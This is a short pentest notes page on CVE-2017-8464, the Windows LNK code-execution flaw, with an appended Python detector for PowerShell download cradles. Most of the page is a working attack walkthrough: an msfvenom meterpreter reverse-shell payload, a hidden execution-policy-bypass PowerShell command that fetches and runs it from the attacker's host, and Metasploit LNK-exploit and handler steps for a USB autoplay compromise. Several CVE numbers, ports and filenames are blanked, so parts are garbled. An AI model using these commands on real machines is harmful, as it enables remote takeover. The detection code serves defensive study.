Common CVEs
CVE--
Affected versions
Windows /Windows 8.1/Windows RT 8.1/Windows /Windows Server /Windows Server R2/Windows Server /Windows Server R2/Windows Server
Method one
- On Kali
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=KaliIP LPORT= -f psh-reflection > .ps1
cp /root/.ps1 /var/www/html
- On the target machine
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://kaliIP/1.ps1');test.ps1"
- On Kali
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST KaliIP
set LPORT
exploit
Method two
- On Kali
Download: https://github.com/rapid7/metasploit-framework/archive/master.zip
Copy cve_2017_8464_lnk_rce.rb from modules/exploits/windows/fileformat inside the archive to /usr/share/metasploit-framework/modules/exploits/windows/fileformat
Copy the cve-2017-8464 folder from data/exploits inside the archive to /usr/share/metasploit-framework/data/exploits
Open a terminal; the generated files are written to /root/.msf4/local:
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [your IP address]
exploit
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [your IP address]
run
- On the target machine
Insert the removable disk into the target machine; if autoplay is enabled on the target, the session calls back as soon as "browse files" is selected.
Method three
- POC/EXP
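As an added detection-side example (not part of the original page), the Python below flags process-creation command lines that match the PowerShell download cradle launched in method one above: hidden window, execution-policy bypass, and an in-memory fetch-and-invoke. The event records are constructed samples and the indicator names are my own.

```python
import re

# Indicators taken from the launch command used in method one above:
# hidden window, execution-policy bypass, in-memory download-and-invoke.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec_bypass": re.compile(r"-e(?:xec(?:utionpolicy)?)?\s+bypass", re.I),
    "download_string": re.compile(r"\.DownloadString\(", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
}

def powershell_indicators(cmdline: str) -> list[str]:
    """Return the names of cradle indicators present in one command line."""
    if not re.search(r"\bpowershell(?:\.exe)?\b", cmdline, re.I):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def is_download_cradle(cmdline: str) -> bool:
    """Flag a remote fetch that is paired with in-memory execution
    or with one of the evasion switches (hidden window, policy bypass)."""
    hits = set(powershell_indicators(cmdline))
    fetch = "download_string" in hits or "webclient" in hits
    return fetch and bool(hits & {"invoke_expression", "hidden_window", "exec_bypass"})

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe",
     "cmd": "powershell -windowstyle hidden -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://kaliIP/1.ps1')\""},
    {"pid": 4188, "parent": "explorer.exe",
     "cmd": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1"},
    {"pid": 4201, "parent": "svchost.exe",
     "cmd": "powershell -w hidden -c (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a')"},
]

def scan_events(events):
    """Return (pid, indicators) for every event that looks like a cradle."""
    return [(e["pid"], powershell_indicators(e["cmd"]))
            for e in events if is_download_cradle(e["cmd"])]

if __name__ == "__main__":
    for pid, hits in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(hits)}")
```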